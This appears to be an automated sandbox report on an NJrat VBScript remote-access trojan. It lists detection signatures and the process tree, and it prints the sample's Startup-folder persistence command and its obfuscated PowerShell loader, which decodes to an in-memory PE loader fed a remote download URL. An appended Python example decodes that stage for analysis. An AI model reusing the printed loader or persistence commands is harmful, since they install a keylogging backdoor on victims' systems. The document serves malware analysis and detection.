Windows
Analysis Report
NJratccccassssG2.00.vbs
Overview
General Information
Detection
Njrat
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected Njrat
Antivirus detection for URL or domain
Sigma detected: Encoded FromBase64String
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Sigma detected: FromBase64String Command Line
Sigma detected: Suspicious Encoded PowerShell Command Line
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Very long command line found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Uses ping.exe to sleep
Sigma detected: Suspicious PowerShell Cmdline
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
- wscript.exe (PID: 6576 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- cmd.exe (PID: 4560 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 3732 cmdline: ping 127.0.0.1 -n 10 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- powershell.exe (PID: 6844 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 5608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?'; $OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ [remainder of the command line is a long obfuscated base64 blob beginning with the PE header; it is garbled and cut off in the report])
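The PID 5608 PowerShell command above is a two-stage loader: a base64 string with every 'A' swapped for '?' is restored, base64-decoded and read as UTF-16LE, and the resulting script then has a placeholder token replaced by a second base64 blob that starts with the PE header. The following is an added worked example, not code from the report or from the sample, that redoes that stage-1 decode offline on the $Codigo value copied from the process listing (report-extraction whitespace removed), then checks the result for reflective-loading indicators and for this family's reversed download URL. The indicator list, the reversed-URL regex and the round-trip sample in the test are the example's own assumptions, not values the report enumerates.

```python
"""Stage-1 deobfuscation of the PowerShell loader command line shown above.

Added worked example; not part of the original report. It redoes, offline, the
transformation the loader itself performs on $Codigo and then looks for the
reflective-loading indicators and the reversed download URL in the result.
"""
import base64
import re

# $Codigo as it appears in the report's process listing for powershell.exe
# (PID 5608), with the spaces inserted by report extraction removed. The '?'
# characters are the sample's own obfuscation: the loader restores them with
# .replace('?','A') before base64-decoding.
CODIGO = (
    "J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?"
    "XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?"
    "bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?"
    "JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?"
    "XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?"
    "ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?"
    "d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?"
    "b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?"
    "cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?"
    "Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?"
)

# Substrings that mark an in-memory .NET assembly loader. This indicator list is
# the example's own choice (assumption), not something the report enumerates.
LOADER_INDICATORS = (
    "[System.Convert]::FromBase64String",
    "[System.AppDomain]::CurrentDomain.Load(",
    ".GetMethod(",
    ".Invoke(",
)


def decode_codigo(blob: str, placeholder: str = "?", restored: str = "A") -> str:
    """Redo the loader's own decoding step: undo the character substitution,
    base64-decode, and read the bytes as UTF-16LE, which is what PowerShell's
    [System.Text.Encoding]::Unicode.GetString() does.

    Whitespace is stripped first because sandbox and report extraction often
    break long command lines with spaces, and missing '=' padding is restored so
    a blob that was truncated still yields its decodable prefix."""
    b64 = re.sub(r"\s+", "", blob).replace(placeholder, restored)
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    # An odd trailing byte left by a truncated blob is replaced, not raised on.
    return raw.decode("utf-16-le", errors="replace")


def is_pe_blob(b64_text: str) -> bool:
    """'TVqQ' is the base64 encoding of the DOS header bytes b'MZ\\x90', so a
    replacement argument beginning with it carries a base64-encoded PE image
    (the report's second .replace() argument starts exactly this way)."""
    return re.sub(r"\s+", "", b64_text).startswith("TVqQ")


def find_loader_indicators(script: str) -> list:
    """Return the indicators present in a decoded script, in a stable order."""
    return [ind for ind in LOADER_INDICATORS if ind in script]


def recover_reversed_urls(script: str) -> list:
    """The decoded stage passes its download URL reversed ('...//:ptth');
    find such single-quoted literals and reverse them back."""
    return [m[::-1] for m in re.findall(r"'([^']*//:ptth)'", script)]


if __name__ == "__main__":
    stage2 = decode_codigo(CODIGO)
    print(stage2)
    print("indicators:", find_loader_indicators(stage2))
    print("download URL(s):", recover_reversed_urls(stage2))
```

Running it prints the stage-2 PowerShell that the sandbox never shows as text: a variable holding the '%MISqHGKZMA%' placeholder, a FromBase64String call, [System.AppDomain]::CurrentDomain.Load on the resulting byte array, and a GetMethod().Invoke() call whose single argument is the reversed download URL. Stage 2 is therefore the in-memory load of the PE that the outer .replace() splices in, which is what the "Injects a PE file" and ".NET source code contains potential unpacker" signatures above are reacting to. The padding repair matters in practice: sandbox reports and EDR telemetry regularly truncate command lines of this length, and without it base64.b64decode raises on the cut-off blob instead of returning the decodable prefix.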